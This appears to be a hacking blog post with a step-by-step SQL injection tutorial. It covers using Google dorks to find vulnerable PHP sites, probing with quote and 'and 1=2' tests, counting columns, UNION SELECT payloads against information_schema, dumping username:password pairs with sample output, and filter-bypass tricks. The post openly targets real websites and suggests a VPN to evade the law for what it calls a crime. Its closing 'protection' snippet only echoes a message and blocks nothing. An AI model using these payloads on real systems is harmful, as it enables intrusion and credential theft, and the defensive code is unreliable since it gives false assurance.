0

SQL Injection
1) SQL Injection?
SQL Injection is type of web attack. Attacker use hole in script to take all data from database. Vulnerable sites are in format:

Code
http://www.link.com/index.php?id=

You can put anything else instead of index.
2) Finding vulnerable sites:
Best way to find vulnerable site is by using Google. We use these dorks to find sites but if you have your own may than go ahead :

 Code
inurl:faq.php?id=

inurl:event.php?id=
inurl:index.php?id=

3) Site vulnerability check:
There are 2 ways to check if site is vulnerable so here are the ways.

1st way, we got link:
Code
http://site.com/book.php?id=141

we are gonna add only ‘ at end of link so we get this link:
 Code
http://site.com/book.php?id=141'

2nd way, we got link:
 Code
http://site.com/book.php?id=141

we are going to add +and+1=2– at end of link so we get:
 Code
http://site.com/book.php?id=141+and+1=2--

If some part of page disappear (picture, text or something) or any error like (You have an error in your SQL syntax) site is vulnerable.
4) Finding number of columns
We can do it by using function order by, on link :

Code
[http://site.com/book.php?id=141

adding +order+by+5–
Code
http://site.com/book.php?id=141+order+by+5--

If page is opens normal there is more then 5 columns. Lets try with 10.
 Code
http://site.com/book.php?id=141+order+by+10--

Now some part of site disappeared, which means that there’s more then 5 and less then 10 columns. Lets try 7.
Code
http://site.com/book.php?id=141+order+by+7--

Page is opened normally which means that there is more then 7 and less then 10 columns. Lets try 8.
 Code
http://site.com/book.php?id=141+order+by+7--

on column 8 part of site disappear which means that there is 7 columns.
5) Finding vulnerable columns
Finding vulnerable columns is done with function union select all on link (in this case) we are going to add+union+select+all+1,2,3,4,5,6,7–
 Code
http://site.com/book.php?id=-141+union+select+all+1,2,3,4,5,6,7--

It is going to write numbers on page (in this case 1 2 3 4 5 6 7) which means that data can be taken from any column. We are going to take from second column.
6) Finding database version
As I said we are gonna take data from second column. Instead of number 2 we are going to put version() or @@version
Code
http://site.com/book.php?id=-141+union+select+all+1,@@version,3,4,5,6,7--

on page where number 2 was, it will show database version.
If database version is 4 we have to guess name of table and column, but if database version is 5 we have to guess database version.

We have version 5.0.51a-24+lenny5 which means that we don’t have to guess name of table and column.
7) Finding table names
If database version is 4 you wont be able to find name of table and column, you have to guess their names. If database version is skip this step.
Names of some possible tables:

Code
admin

admins
user
users
member
members

Names of some possible columns:
 Code
username

uname
un
user
name
nick
password
pw
pwd
passwd

If database version is 5 we can take name of table by doing next step: instead of number 2 we going to putgroup_concat(table_name) and after number of last column+from+information_schema.tables+where+table_schema=database()–
So we get this link:
Code
http://site.com/book.php?id=-141+union+select+all+1,group_concat(table_name),3,4,5,6,7+from+information_schem​a.tables+where+table_schema=database()--

Instead of number 2 it showed name of table, in this case date, book, users. We gonna take columns from users table.
8) Finding column name
We found table name that we want and now from that we want to take columns. Instead ofgroup_concat(table_name) we are going to put group_concat(column_name) and instead of+from+information_schema.tables+where+table_schema=database()– we are going to put+from+information_schema.columns+where+table_name=hex– instead of hex we have to encrypt in hex name of table.
Go to:
Code
http://www.string-functions.com/string-hex.aspx

write the name of thetable (in this case users) and we get hex-ed number: 7573657273 so now can see the columns:
  Code
http://site.com/book.php?id=-141+union+select+all+1,group_concat(column_name),3,4,5,6,7+from+information_sche​ma.columns+where+table_name=0x7573657273--

9) Taking data from columns
We got: id, name, surname, username, password, level.
We need only username and password.

Instead of group_concat(column_name) we put group_concat(username,0x3a,password) 0x3a stands for to make space between user and pw. Instead of from+information_schema.columns+where+table_name=0x7573657273– we put +from+users–
and we have link:
Code
http://site.com/book.php?id=-141+union+select+all+1,group_concat(username,0x3a,password),3,4,5,6,7+from+users​--

and result e.g.:
Code
sebrezovski:1533562

seratum:seratum
coach:53.21.1985.
biga:biga

which is users and passwords from this site.
10) Filter bypassing
In case when you write union+select+all says “not accessible” then change it to UnIoN+sElEcT+aLl
On some sites space is restricted so you can put + or /**/ (/* start of comment in php and finish */)
On some sites there is also restricted database version so you can use unhex(hex(version()))

11) Site protection from SQL Injection
Just put this code in your script:
Code
if(!is_numeric($_GET['id']))

{
echo 'It is gonna write text when some try to add /' or and+1=2';
}
Hope you enjoy :)
So to be safe use always a vpn when you hack a website because is a crime

Post a Comment Blogger

Comment Rules:-
1.We don't publish Your comments if we found any third party Links.
2. Don't be Abusive here. We take strong action against abuser.
3.You can Report Bugs here.
4.You should comment if Links are Dead.[please check all mirror links before commenting]
5.Don't forget to check "Notify Me" to get reply on your email.

 
Top